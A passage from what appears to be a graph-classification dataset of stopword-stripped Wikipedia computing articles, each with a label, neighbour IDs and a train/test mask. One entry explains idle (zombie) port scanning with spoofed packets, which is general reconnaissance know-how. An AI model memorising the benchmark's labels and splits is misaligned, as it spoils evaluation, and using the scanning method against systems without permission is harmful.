      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      3512,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 1191,
    "label": 2,
    "text": "Droid_fonts:droid fonts droid font family first released 2007 created ascender corporation use open handset alliance platform android licensed apache license fonts intended use small screens mobile handsets designed steve matteson ascender corporation name derived open handset alliance platform named android nowiki /nowiki unlike sans fonts capital letter retains serifs droid font family consists droid sans droid sans mono droid serif typeface extensive character set including coverage western european eastern/central european baltic cyrillic greek turkish languages 12 february 2009 ascender corporation announced retail version droid fonts droid pro family fonts sold opentype truetype font format planned droid pro family consists droid sans pro regular bold droid sans pro condensed regular bold droid sans pro mono regular bold droid serif pro regular italic bold bold italic droid sans fallback initial releases include droid sans pro droid serif pro opentype features include old style figures droid sans pro mono went sale beginning 2009-07-31 handset condensed 2010 handset condensed condensed version droid sans pro designed ascender corp steve matteson released 1 march 2013 compatible droid family fonts without opentype features similar droid sans pro family includes 2 fonts bold regular weights without italics supports wgl character set 2009 ascender corporation designed specially customed fonts google fonts api language support arabic persian languages fonts released available google fonts website droid arabic naskh bold regular weights droid arabic kufi bold regular weights variations found recently includes droid persian naskh specific font persian farsi language distributed open font library may 2014 found android smartphones operate android 4.2 jellybean os following fonts found fonts folder phone rooted 'systems folder fonts include variations droid font aimed depict android 'robot image logo include droid robot regular font droid robot japanese regular font japanese language support aims specific language font designers adapt fonts particular southern asian languages include droid hindi support hindi language droid telugu support telugu language droid india support indian languages india fonts could found github xda developers forum android smartphones",
    "neighbors": [
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      1435,
      7835,
      9244,
      798,
      10525,
      288,
      673,
      2978,
      11294,
      2852,
      8486,
      1191,
      8870,
      937,
      1578,
      6057,
      7595,
      4141,
      10537,
      7983,
      5431,
      2875,
      3900,
      10045,
      10432,
      196,
      69,
      6212,
      11082,
      332,
      4685,
      3664,
      2001,
      3409,
      8019,
      8280,
      5467,
      8285,
      8413,
      9949,
      2658,
      3940,
      1255,
      9192,
      9320,
      8554,
      1516,
      5100,
      2798,
      5613,
      8940,
      10352,
      5620,
      11252,
      7548,
      8701,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 1192,
    "label": 5,
    "text": "ALOHAnet:alohanet alohanet also known aloha system simply aloha pioneering computer networking system developed university hawaii alohanet became operational june 1971 providing first public demonstration wireless packet data network aloha originally stood additive links on-line hawaii area alohanet used new method medium access aloha random access experimental ultra high frequency uhf operation since frequency assignments communications computer available commercial applications 1970s even frequencies assigned two media available application aloha channel – cables satellites 1970s aloha random access employed nascent ethernet cable based network marisat inmarsat satellite network early 1980s frequencies mobile networks became available 1985 frequencies suitable became known wi-fi allocated us regulatory developments made possible use aloha random-access techniques wi-fi mobile telephone networks aloha channels used limited way 1980s 1g mobile phones signaling control purposes late 1980s european standardisation group gsm worked pan-european digital mobile communication system gsm greatly expanded use aloha channels access radio channels mobile telephony addition sms message texting implemented 2g mobile phones early 2000s additional aloha channels added 2.5g 3g mobile phones widespread introduction gprs using slotted-aloha random-access channel combined version reservation aloha scheme first analyzed group bbn one early computer networking designs development aloha network begun september 1968 university hawaii leadership norman abramson along thomas gaarder franklin kuo shu lin wesley peterson edward ned weldon goal use low-cost commercial radio equipment connect users oahu hawaiian islands central time-sharing computer main oahu campus first packet broadcasting unit went operation june 1971 terminals connected special purpose terminal connection unit using rs-232 9600 bit/s original version aloha used two distinct frequencies hub configuration hub machine broadcasting packets everyone outbound channel various client machines sending data packets hub inbound channel data received correctly hub short acknowledgment packet sent client acknowledgment received client machine short wait time would automatically retransmit data packet waiting randomly selected time interval acknowledgment mechanism used detect correct collisions created two client machines attempted send packet time alohanet primary importance use shared medium client transmissions unlike arpanet node could talk directly node end wire satellite circuit alohanet client nodes communicated hub frequency meant sort mechanism needed control could talk time alohanet solution allow client send data without controlling sent acknowledgment/retransmission scheme used deal collisions approach radically reduced complexity protocol networking hardware since nodes need negotiate allowed speak see token ring solution became known pure aloha random-access channel basis subsequent ethernet development later wi-fi networks various versions aloha protocol slotted aloha also appeared later satellite communications used wireless data networks ardis mobitex cdpd gsm also important alohanet use outgoing hub channel broadcast packets directly clients second shared frequency using address packet allow selective receipt client node two frequencies used device could receive acknowledgments regardless transmissions aloha network introduced mechanism randomized multiple access resolved device transmission collisions transmitting package immediately acknowledgement present acknowledgment received transmission repeated random waiting time version protocol called pure aloha one implemented alohanet quite simple note first step implies pure aloha check whether channel busy transmitting since collisions occur data may sent aloha use 100 capacity communications channel long station waits transmits likelihood collision occurs interrelated affect efficiently channel used means concept transmit later critical aspect quality backoff scheme chosen significantly influences efficiency protocol ultimate channel capacity predictability behavior assess pure aloha need predict throughput rate successful transmission frames discussion pure aloha performance follows tanenbaum first let make simplifying assumptions let refer time needed transmit one frame channel let define frame-time unit time equal let g refer mean used poisson distribution transmission-attempt amounts average g transmission-attempts per frame-time consider needs happen frame transmitted successfully let refer time intended send frame preferable use channel one frame-time beginning stations refrain transmitting time frame-time probability k transmission-attempts frame-time formula_1 average amount transmission-attempts 2 consecutive frame-times 2 g hence pair consecutive frame-times probability k transmission-attempts two frame-times formula_2 therefore probability formula_3 zero transmission-attempts t-t t+t thus successful transmission us formula_4 throughput calculated rate transmission-attempts multiplied probability success concluded throughput formula_5 formula_6 vulnerable time=2*t. maximum throughput 0.5/e frames per frame-time reached g 0.5 approximately 0.184 frames per frame-time means pure aloha 18.4 time used successful transmissions another simple mathematical way establish equation throughput pure aloha slotted aloha follows consider needs happen frames transmitted successfully let represent frame time simplicity assumed contention begins t=0 exactly one node sends interval t=0 t=t node tries t=t t=2t frame transmitted successfully similarly next time intervals t=2nt t= 2n+1 exactly one node sends t= 2n+1 t= 2n+2 node tries send n=1,2,3 ... frames successfully transmitted pure aloha nodes begin transmission whenever want without checking nodes time thus sending frames independent events transmission particular node neither affects affected time start transmission nodes let g average number nodes begin transmission within period frame time large number nodes trying transmit using poisson distribution probability exactly x nodes begin transmission period formula_7 therefore probability particular period t=2nt t= 2n+1 particular non-zero integer value n exactly one node begin transmission formula_8 probability particular period t= 2n+1 t= 2n+2 node begin transmission formula_9 successful transmission frame events occur simultaneously period t=2nt t= 2n+1 exactly one node begins transmission t= 2n+1 t= 2n+2 node begins transmission hence probability independent events occur simultaneously formula_10 throughput throughput intended mean probability successful transmission minimum possible period therefore throughput pure aloha formula_6 suppose： 1 n nodes attempt send data time t. 2 probability successful transmission one node formula_12 probability successful transmission like following formula_13 similarly slotted aloha frame successfully transmitted exactly one node begin transmission beginning particular time slot equal frame time probability one node begin particular time slot formula_14 throughput slotted aloha thus formula_15 disadvantages pure aloha 1 time wasted 2 data lost improvement original aloha protocol slotted aloha introduced discrete timeslots increased maximum throughput station start transmission beginning timeslot thus collisions reduced case transmission-attempts within 1 frame-time 2 consecutive frame-times need considered since collisions occur timeslot thus probability zero transmission-attempts stations single timeslot formula_16 probability transmission requiring exactly k attempts k-1 collisions 1 success formula_17 throughput formula_18 maximum throughput 1/e frames per frame-time reached g 1 approximately 0.368 frames per frame-time 36.8 slotted aloha used low-data-rate tactical satellite communications networks military forces subscriber-based satellite communications networks mobile telephony call setup set-top box communications contactless rfid technologies use random-access channel alohanet led development carrier sense multiple access csma listen send random-access protocol used nodes send receive channel first implementation csma ethernet csma radio channels extensively modeled ax.25 packet radio protocol based csma approach collision recovery based experience gained alohanet aloha random-access protocols inherent variability throughput delay performance characteristics reason applications need highly deterministic load behavior sometimes used polling token-passing schemes token ring instead contention systems instance arcnet popular embedded data applications 1980 network two fundamental choices dictated much alohanet design two-channel star configuration network use random accessing user transmissions two-channel configuration primarily chosen allow efficient transmission relatively dense total traffic stream returned users central time-sharing computer additional reason star configuration desire centralize many communication functions possible central network node menehune minimizing cost original all-hardware terminal control unit tcu user node random-access channel communication users menehune designed specifically traffic characteristics interactive computing conventional communication system user might assigned portion channel either frequency-division multiple access fdma time-division multiple access tdma basis since well known time-sharing systems circa 1970 computer user data bursty fixed assignments generally wasteful bandwidth high peak-to-average data rates characterize traffic achieve efficient use bandwidth bursty traffic alohanet developed random-access packet switching method come known pure aloha channel approach effectively dynamically allocates bandwidth immediately user data send using acknowledgment/retransmission mechanism described earlier deal occasional access collisions average channel loading must kept 10 maintain low collision rate still results better bandwidth efficiency fixed allocations used bursty traffic context two 100 khz channels experimental uhf band used implemented system one user-to-computer random-access channel one computer-to-user broadcast channel system configured star network allowing central node receive transmissions random-access channel user tcus received transmission made central node broadcast channel transmissions made bursts 9600 bit/s data control information encapsulated packets packet consisted 32-bit header 16-bit header parity check word followed 80 bytes data 16-bit parity check word data header contained address information identifying particular user menehune broadcast packet intended user node would accept central node communications processor hp 2100 minicomputer called menehune hawaiian language word imp dwarf people named similar role original arpanet interface message processor imp deployed time original system menehune forwarded correctly received user data uh central computer ibm system 360/65 time-sharing system outgoing messages 360 converted packets menehune queued broadcast remote users data rate 9600 bit/s unlike half-duplex radios user tcus menehune interfaced radio channels full-duplex radio equipment original user interface developed system all-hardware unit called alohanet terminal control unit tcu sole piece equipment necessary connect terminal aloha channel tcu composed uhf antenna transceiver modem buffer control unit buffer designed full line length 80 characters allowed handling 40- 80-character fixed-length packets defined system typical user terminal original system consisted teletype model 33 dumb crt user terminal connected tcu using standard rs-232c interface shortly original aloha network went operation tcu redesigned one first intel microprocessors resulting upgrade called pcu programmable control unit additional basic functions performed tcu pcu generation cyclic-parity-check code vector decoding received packets packet error-detection purposes generation packet retransmissions using simple random interval generator acknowledgment received menehune prescribed number automatic retransmissions flashing light used indicator human user also since tcu pcu send acknowledgments menehune steady warning light displayed human user error detected received packet thus seen considerable simplification incorporated initial design tcu well pcu making use fact interfacing human user network later versions system simple radio relays placed operation connect main network island oahu islands hawaii menehune routing capabilities expanded allow user nodes exchange packets user nodes arpanet experimental satellite network details available technical reports listed reading section",
    "neighbors": [
      10112,
      2306,
      388,
      8708,
      3847,
      6152,
      11288,
      2458,
      5020,
      2211,
      1192,
      11560,
      7723,
      11181,
      7865,
      7490,
      9284,
      5321,
      7498,
      2911,
      2785,
      5092,
      5863,
      4335,
      2802,
      9599
    ],
    "mask": "Test"
  },
  {
    "node_id": 1193,
    "label": 6,
    "text": "Temporary_folder:temporary folder computing temporary folder temporary directory directory used hold temporary files many operating systems software automatically delete contents directory bootup regular intervals leaving directory intact security reasons best user temporary directory since history security vulnerabilities temporary files due programs incorrect file permissions race conditions standard procedure system administration reduce amount storage space used typically disk drive removing temporary files multi-user systems potentially remove active files disrupting users activities avoid space-reclaiming procedures remove files inactive old read modified several days unix /tmp directory often separate disk partition systems magnetic hard disk drives performance overall system iops increase disk-head movements regular disk i/o separated access temporary directory increasingly memory-based solutions temporary directory folder used ram disks set random-access memory shared-memory device linux flash-based solid-state drive less suitable temporary-storage device reading writing due asymmetric read/write duration due wear see wear leveling ms-dos microsoft windows temporary directory set environment variable originally default windows xp era temporary directory set per-user although still user-relocatable windows vista 7 8 10 temp location moved within appdata section user profile typically user name versions windows temp location accessed example explorer run ... boxes application internal code using environmental variables synonymous full path unix linux global temporary directories web browsers periodically write data tmp directory page views downloads typically persistent files may preserved reboots temporary files see filesystem hierarchy standard addition user set tmpdir environment variable point preferred directory creation modification files allowed openvms amigados used",
    "neighbors": [
      2432,
      3330,
      5636,
      5514,
      6797,
      8988,
      5661,
      6813,
      9762,
      5158,
      7847,
      6184,
      7983,
      8369,
      52,
      1844,
      823,
      9533,
      3522,
      9166,
      2383,
      5969,
      8402,
      1109,
      6358,
      5975,
      7907,
      1509,
      2534,
      6633,
      6126,
      7663,
      9840,
      3571,
      5492,
      7540,
      2811,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1194,
    "label": 3,
    "text": "Gradiente_Expert:gradiente expert expert made gradiente eletrônica date best known game console hi-fi equipment company second last msx home computer launched brazilian market mid-1980s presented public 5th international computing fair nicknamed informatica '85 event took place anhembi exhibition center city são paulo september 23 29 1985 announcement computer priced 65 ortn s. market release date 1 december 1985 one week epcom hotbit time 1985 christmas massive media campaign magazines newspapers tv newspapers ads initial offer price cr 4.640.000,00 us 493,62 usd value time us 1150 modern u.s. dollars 2019 machine clone national cf-3000 computer case resembling stereo system detached keyboard proprietary connector caps lock led reset key although soft-reset could achieved pushing either cartridge slot covers expert xp-800 followed expert gpc-1 gradiente personal computer 1987 expert plus expert dd plus system built-in 720 kb 3½ floppy disk drive 1989 expert users waited msx2 machine gradiente never produced discontinued msx line 1990 two first versions graphite case socketed chips caused chronic problem machine heated chips frequently pulled system froze also gpc-1 released 1987 rom slightly modified solve ascii table compatibility issue popular brazilian msx sharp hotbit last two versions black case problematic socketed chips replaced asic nevertheless ram mapped secondary slot although straight msx standards caused lot crashes programs searched memory wrong place contribute popularity plus versions",
    "neighbors": [
      1121,
      7591,
      780,
      3788,
      9006,
      7983,
      1776,
      4409,
      1403
    ],
    "mask": "Test"
  },
  {
    "node_id": 1195,
    "label": 7,
    "text": "Peer-to-peer_SIP:peer-to-peer sip peer-to-peer sip p2p-sip implementation distributed voice internet protocol voip instant messaging communications application using peer-to-peer p2p architecture session control communication end points facilitated session initiation protocol sip pure peer-to-peer application architecture central servers required whereas traditional sip telephony networks relied using centrally deployed managed sip servers analogy centralized switching architecture public switched telephone network pstn p2p application design improve scalability survivability event central network outages session initiation protocol principle client-server protocol however described analogy p2p relationship called dialog defined unique combination sip protocol parameters to-tag from-tag call-id endpoints communication session implement user-agent server user-agent client enables two user agents communicate directly one another without mediation another central switching system sip also provides facilities registering register request network location user agent sip elements subscription subscribe request notification notify request features event tracking user agents based inherent sip features possible construct peer-to-peer network sip nodes another approach sip p2p sip location service replaced conventional p2p overlay networking approach oversim framework model overlay network used service node discovery rendezvous search key mechanism uniform resource identifier uri user agent uri requires resolution particular device uniform resource locator url must performed real time p2p-sip systems may employ structured peer-to-peer approaches well unstructured peer-to-peer architectures internet engineering task force ietf conducting working group p2psip develops standards-track specifications p2p-sip effort based using resource location discovery reload base protocol peer-to-peer p2p signaling protocol use internet p2p signaling protocol provides network nodes form overlay network abstract storage messaging security services",
    "neighbors": [
      8640,
      10271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1196,
    "label": 7,
    "text": "Bring_your_own_encryption:bring encryption bring encryption byoe —also called bring key byok —refers cloud computing security marketing model purports help cloud service customers use encryption software manage encryption keys byoe allows cloud service customers use virtualized example encryption software together business applications hosting cloud order encrypt data business applications hosted set data processed encryption software writes ciphertext version data cloud service provider physical data store readily decrypts ciphertext data upon retrieval requests gives enterprise perceived control keys producing master key relying internal hardware security modules hsm transmitted hsm within cloud data owners may believe data secured master key lies enterprise hsm cloud service provider data longer needed i.e cloud users choose abandon cloud service keys simply deleted practice called crypto-shredding",
    "neighbors": [
      5034,
      9085,
      2932,
      3629
    ],
    "mask": "Train"
  },
  {
    "node_id": 1197,
    "label": 3,
    "text": "Reliable_multicast:reliable multicast reliable multicast protocol computer networking protocol provides reliable sequence packets multiple recipients simultaneously making suitable applications multi-receiver file transfer multicast network addressing method delivery information group destinations simultaneously using efficient strategy deliver messages link network creating copies links multiple destinations split typically network switches routers however like user datagram protocol multicast guarantee delivery message stream messages may dropped delivered multiple times delivered order reliable multicast protocol adds ability receivers detect lost and/or out-of-order messages take corrective action similar principle tcp resulting gap-free in-order message stream exact meaning reliability depends specific protocol instance minimal definition reliable multicast eventual delivery data group members without enforcing particular delivery order however reliable multicast protocols ensure level reliability many trade efficiency reliability different ways example tcp makes sender responsible transmission reliability multicast nak-based protocols shift responsibility receivers sender never knows sure receivers fact received data rfc- 2887 explores design space bulk data transfer brief discussion various issues hints possible different meanings reliable reliable group data delivery rgdd form multicasting object moved single source fixed set receivers known transmission begins variety applications may need delivery hadoop distributed file system hdfs replicates chunk data two additional times specific servers vm replication multiple servers may required scale applications data replication multiple servers may necessary load balancing allowing multiple servers serve data local cached copies delivery frequent within datacenters due plethora servers communicating running highly distributed applications rgdd may also occur across datacenters sometimes referred inter-datacenter point multipoint p2mp transfers transfers deliver huge volumes data one datacenter multiple datacenters various applications search engines distribute search index updates periodically e.g every 24 hours social media applications push new content many cache locations across world e.g youtube facebook backup services make several geographically dispersed copies increased fault tolerance maximize bandwidth utilization reduce completion times bulk transfers variety techniques proposed selection multicast forwarding trees modern systems like spread toolkit quicksilver corosync achieve data rates 10,000 multicasts per second scale large networks huge numbers groups processes distributed computing platforms support one models example widely supported object-oriented corba platforms support transactions corba products support transactional replication one-copy-serializability model corba fault tolerant objects standard based virtual synchrony model virtual synchrony also used developing new york stock exchange fault-tolerance architecture french air traffic control system us navy aegis system ibm business process replication architecture websphere microsoft windows clustering architecture windows longhorn enterprise servers virtual synchrony first supported cornell university called isis toolkit cornell current version vsync released 2013 name isis2 name changed isis2 vsync 2015 wake terrorist attack paris extremist organization called isis periodic updates revisions since time current stable release v2.2.2020 released november 14 2015 v2.2.2048 release currently available beta form vsync aims massive data centers support cloud computing systems include horus system transis system totem system ibm system called phoenix distributed security key management system called rampart ensemble system quicksilver system openais project derivative corosync cluster engine number products including ibm microsoft ones mentioned earlier",
    "neighbors": [
      7361,
      4194,
      1411,
      1669,
      10917,
      10924,
      5071,
      5653,
      11413,
      7256,
      8252,
      10686
    ],
    "mask": "Test"
  },
  {
    "node_id": 1198,
    "label": 3,
    "text": "Sam_Labs:sam labs sam labs startup makes app-enabled construction kits designed people ages learn stem play create technology internet things founded belgian born ceo joachim horn company works headquarters east london month-long kickstarter campaign initiated october 2014 raised 160,000 helped launch mass production kits backers included jawbone co-founder alexander asseily pre-ordered kit company featured wired telegraph 29 september 2014 sam labs launched month-long kickstarter campaign crowdfund mass manufacture sam kits spring 2015 primarily pre-orders kits conclusion campaign 29 october sam labs raised 160,000 817 backers sam labs produces app-enabled construction toys sam science museum inventor kit produced collaboration london science museum using sam blocks free sam space app inside kit kids build awesome projects games inventions hacks super quick super smart company hero kit sam curious cars launched october 2016 available barnes noble across united states john lewis department store united kingdom curious cars kit allows kids build program cars games winning ifa markit innovation award consumer electronics show award kapi award triple-award-winning kit also comes app curious cars sam labs created habit working local design talent sam labs first partnered map project office london-based creative consultancy specialises industrial design deliver kickstarter campaign map also featured sam labs video collaboration honda sam led modules featured promotional video covering technology exploration second design partnership pentagram design studio collaborate around sam labs branding never stands still recently sam collaborated hato press london science museum create sam labs science museum inventor kit sam labs kits received two design week awards best show award interactive design award judges said “ really cohesive design elegant packaging use product amazing use code education really steps beyond expected design opens hundreds possibilities. ” additionally sam labs kit received four maker faire awards make magazine three editor choice awards one best class award sam labs winner november 2014 pitch palace uk royal competition saw sam presented world economic forum january 2015 partnership map project office sam labs awarded best interactive design design week awards 2015 sam labs also became member disrupt 100 innovative companies educational toys winner gold medal best educational gaming toy 2016 independent toy awards sam labs swept four awards throughout q4 silver place uk business awards disruptive business model ifa markit innovation award apps platforms ecosystems best educational toy toy testers awards ces innovation award tech better world category winning alphr itpro award best startup 2016 company landed finalist position gess education awards 2017",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 1199,
    "label": 3,
    "text": "Cowloop:cowloop cowloop copy-on-write loop driver linux kernel driver allows read-only filesystems made writable using kernel module cowloop.ko cowloop worked writing modified blocks separate file known cowfile created using cowdev command associate block device cd writable file cowloop largely deprecated favor device-mapper snapshot target provides functionality also integrated lvm2 linux logical volume manager version 2 cowloop provided somewhat similar functionality unionfs newer aufs operates block level instead operating file system level free software released terms gnu general public license v2 later",
    "neighbors": [
      5120,
      9762,
      2230,
      9882
    ],
    "mask": "Test"
  },
  {
    "node_id": 1200,
    "label": 4,
    "text": "Idle_scan:idle scan idle scan tcp port scan method consists sending spoofed packets computer find services available accomplished impersonating another computer called zombie transmitting receiving information observing behavior zombie system action done common software network utilities nmap hping attack involves sending forged packets specific machine target effort find distinct characteristics another zombie machine attack sophisticated interaction attacker computer target attacker interacts zombie computer exploit functions two purposes port scanner mapper trusted ip relationships machines target system interacts zombie computer difference behaviour observed using different zombies evidence different privileges granted target different computers discovered salvatore sanfilippo also known handle antirez 1998 idle scan used many black hat hackers covertly identify open ports target computer preparation attacking although originally named dumb scan term idle scan coined 1999 publication proof concept 16-bit identification field ipid scanner named idlescan filipe almeida aka liquidk type scan also referenced zombie scan nomenclatures due nature one computers involved attack design operation internet based internet protocol suite commonly also called tcp/ip ip primary protocol internet layer internet protocol suite task delivering datagrams source host destination host solely based addresses purpose ip defines addressing methods structures datagram encapsulation connectionless protocol relies transmission packets every ip packet given source id uniquely identifies ip datagram tcp provides reliable ordered delivery stream bytes program one computer another program another computer tcp protocol major internet applications rely world wide web e-mail file transfer applications web server email server ftp server called network service system network services identified using two components host address port number 65536 distinct usable port numbers per host services use limited range numbers default default port number service almost always used port scanners scan common port numbers ports commonly associated vulnerable services given host see list tcp udp port numbers result scan port usually generalized one three categories open ports present two vulnerabilities administrators must wary filtered ports tend present vulnerabilities host local network protected firewall filters according rules administrator set packets done deny services hosts known prevent intrusion inside network ip protocol network layer transmission protocol idle scans take advantage predictable identification field value ip header every ip packet given source id uniquely identifies fragments original ip datagram protocol implementation assigns values mandatory field generally fixed value 1 increment transmitted packets numbered sequence say many packets transmitted two packets receive attacker would first scan host sequential predictable sequence number ipid latest versions linux solaris openbsd windows vista suitable zombie since ipid implemented patches randomized ipid computers chosen used stage known zombies suitable zombie found next step would try establish tcp connection given service port target system impersonating zombie done sending syn packet target computer spoofing ip address zombie i.e source address equal zombie ip address port target computer open accept connection service responding syn/ack packet back zombie zombie computer send rst packet target computer reset connection actually send syn packet first place since zombie send rst packet increment ipid attacker would find targets port open attacker send another packet zombie ipid incremented step attacker would know particular port closed method assumes zombie interactions message sent reasons first interaction attacker zombie second interaction rst message false positive first step executing idle scan find appropriate zombie needs assign ip id packets incrementally global rather per-host communicates basis idle hence scan name extraneous traffic bump ip id sequence confusing scan logic lower latency attacker zombie zombie target faster scan proceed note port open ipids increment 2 following sequence 1 attacker target syn target zombie syn/ack zombie target rst ipid increment 1 2 attacker tries probe zombie result attacker zombie syn/ack zombie attacker rst ipid increment 1 process ipid increments 2 finally idle scan attempted tools example nmap tests proposed zombie reports problems one n't work try another enough internet hosts vulnerable zombie candidates n't hard find common approach simply execute ping sweep network choosing network near source address near target produces better results try idle scan using available host ping sweep results find one works usual best ask permission using someone machines unexpected purposes idle scanning simple network devices often make great zombies commonly underused idle built simple network stacks vulnerable ip id traffic detection identifying suitable zombie takes initial work keep re-using good ones alternatively research utilizing unintended public web services zombie hosts perform similar idle scans leveraging way services perform outbound connections upon user submissions serve kind poor man idle scanning hping method idle scanning provides lower level example idle scanning performed example target host 172.16.0.100 scanned using idle host 172.16.0.105 open closed port tested see scenario plays first establish idle host actually idle send packets using hping2 observe id numbers increase incrementally one id numbers increase haphazardly host actually idle os predictable ip id send spoofed syn packet target host port expect open case port 22 ssh tested since spoofed packet receive reply hping reports 100 packet loss target host replied directly idle host syn/ack packet check idle host see id number increased notice proxy hosts id increased id=1379 id=1381 1380 consumed idle host replied target host syn/ack packet rst packet run processes testing port likely closed testing port 23 telnet notice time id increase port closed sent spoofed packet target host replied idle host rst packet increase id counter first thing user would find suitable zombie lan performing port scan os identification -o option nmap zombie candidate network rather ping scan helps selecting good zombie long verbose mode -v enabled os detection usually determine ip id sequence generation method print line “ ip id sequence generation incremental ” type given incremental broken little-endian incremental machine good zombie candidate still guarantee work solaris systems create new ip id sequence host communicate host could also busy os detection open port list also help identifying systems likely idle another approach identifying zombie candidates run ipidseq nse script host script probes host classify ip id generation method prints ip id classification much like os detection like nse scripts ipidseq.nse run many hosts parallel making another good choice scanning entire networks looking suitable hosts codice_1 tells nmap ping sweep show hosts given ip range found zombie next would send spoofed packets codice_2 images juxtaposition show stages successful scenario although many operating systems immune used attack popular systems still vulnerable making idle scan still effective successful scan completed trace attacker ip address target firewall intrusion-detection system log another useful possibility chance by-passing firewall scanning target zombie computer might extra rights attacker",
    "neighbors": [
      2947,
      3473,
      6548,
      2084,
      8998,
      939,
      10924,
      7983,
      2739,
      823,
      2508,
      4689,
      6993,
      5469,
      11486,
      3169,
      7031,
      5245,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 1201,
    "label": 7,
    "text": "Anaqua_(company):anaqua company anaqua boston based provider intellectual asset management iam saas software services anaqua ’ enterprise iam solution supports ia lifecycle idea monetization ia categories including inventions patents trade secrets brands trademarks anaqua express designed smaller ip teams anaqua element cloud-based solution ip professionals managing small portfolios anaqua essential helps law firms manage intellectual assets behalf clients anaqua formed 2004 bought beacon equity partners 2005 2006 anaqua received 4 million northstar global partners used relocate headquarters london boston hire staff 2010 anaqua merged sga2 iso 9000-certified supplier global patent annuity trademark renewal services 2013 beacon equity partners sold anaqua insight venture partners priya iyer joined anaqua chief operating officer 2005 became ceo 2007 anaqua merged lecorpio llc announced july 25 2017",
    "neighbors": [
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1202,
    "label": 3,
    "text": "MBC-550:mbc-550 mbc-550 small inexpensive personal computer pizza-box style featuring intel 8088 microprocessor running version ms-dos lowest-cost early ibm pc compatibles produced sanyo much better video display possibilities average cga card 8 colors 640x200 resolution vs cga 4 colors 320x200 2 colors 640x200 completely compatible ibm-pc lacked standard bios minimal bootloader rom accessed hardware directly load ram-based bios fm rather mfm diskette format used completely compatible ibm pc special software original pc pc/xt pc/at could read write diskettes software expecting standard 18.2 hz clock interrupt rewritten mbc-550 also computer choice nri training starting building computer nri promised would qualified service repair virtually every major brand computer advertised popular mechanics popular science throughout 1985 august 1985 infoworld reported sanyo initiated campaign sell mbc-550 inventory company newer computers executive claimed 99 pc compatible",
    "neighbors": [
      10692,
      1515,
      9166,
      7983,
      1776,
      6129,
      9363
    ],
    "mask": "Test"
  },
  {
    "node_id": 1203,
    "label": 9,
    "text": "Dart_(programming_language):dart programming language dart client-optimized programming language fast apps multiple platforms developed google used build mobile desktop backend web applications dart object-oriented class defined garbage-collected language using c-style syntax transcompiles optionally javascript supports interfaces mixins abstract classes reified generics static typing sound type system dart unveiled goto conference aarhus denmark october 10–12 2011 project founded lars bak kasper lund dart 1.0 released november 14th 2013 august 2018 dart 2.0 released language changes including sound type system ecma international formed technical committee tc52 work standardizing dart inasmuch dart compiled standard javascript works effectively modern browser ecma international approved dart language specification first edition july 2014 107th general assembly second edition december 2014 latest specification available dart language specification three main ways run dart code achieve concurrency dart uses isolates independent workers share memory instead use message passing similar erlang processes see also actor model every dart program uses least one isolate main isolate since dart 2 dart web platform longer supports isolates suggests developers use web workers instead snapshots core part dart vm snapshots files store objects runtime data google introduced flutter native mobile app development android ios flutter mobile app sdk complete framework widgets tools gives developers way build deploy mobile apps written dart flutter works firebase mobile app sdks open source dart sdk contains two dart-to-javascript compilers development dartdevc supports quick refresh cycles final version app dart2js produces deployable javascript first compiler generate javascript dart code dartc deprecated second dart-to-javascript compiler frog written dart never implemented full semantics language third dart-to-javascript compiler dart2js evolution earlier compilers dart2js written dart intended implement full dart language specification semantics march 28 2013 dart team posted update blog addressing dart code compiled javascript dart2js compiler stating runs faster handwritten javascript chrome v8 javascript engine deltablue benchmark november 18 2011 google released dart editor open-source program based eclipse components mac os x windows linux-based operating systems editor supports syntax highlighting code completion javascript compiling running web server dart applications debugging august 13 2012 google announced release eclipse plugin dart development april 18 2015 google announced dart editor would retired favor jetbrains integrated development environment ide recommended ide language dart plugin available intellij idea pycharm phpstorm webstorm plugin supports many features syntax highlighting code completion analysis refactoring debugging plugins available editors like sublime text atom emacs vim visual studio code 2013 chromium team began work open source chrome app-based development environment reusable library gui widgets codenamed spark project later renamed chrome dev editor built dart contained spark powered polymer june 2015 google transferred cde project github free software project ceased active investment cde april 2019 chrome dev editor longer active development dart team created dartpad start 2015 provide easier way start using dart fully online editor users experiment dart application programming interfaces apis run dart code provides syntax highlighting code analysis code completion documentation html css editing 2013 john mccutchan announced created performant interface single instruction multiple data simd instruction sets dart interface consists two types instances types immutable optimized code mapped directly simd registers operations expressed dart typically compiled one instruction overhead similar c c++ intrinsics benchmarks 4×4 matrix multiplication 3d vertex transformation mandelbrot set visualization show near 400 speedup compared scalar code written dart hello world example main function calculate nth fibonacci number int fib int n n 2 fib n 1 fib n 2 1 // fibonacci function implementation ternary operator dart // code shall read // int n 2 return fib n 1 fib n 2 // otherwise return int 1 result void main simple class // import math library get access sqrt function import 'dart math math // create class point class point // dart programs start main void main dart descendant algol language family alongside c java c javascript others method cascade syntax provides syntactic shortcut invoking several methods one another object adopted smalltalk dart mixins influenced strongtalk ruby dart makes use isolates concurrency security unit structuring applications isolate concept builds upon actor model famously implemented erlang mirror api performing controlled secure reflection first proposed paper gilad bracha member dart team david ungar originally implemented self dart initially mixed reception dart initiative criticized fragmenting web due original plans include dart vm chrome plans dropped focus instead compiling dart javascript",
    "neighbors": [
      512,
      4096,
      2051,
      6154,
      8719,
      3600,
      7700,
      9244,
      9245,
      6176,
      10284,
      5677,
      3633,
      9780,
      6718,
      8262,
      4683,
      11343,
      3664,
      10833,
      8285,
      8289,
      2658,
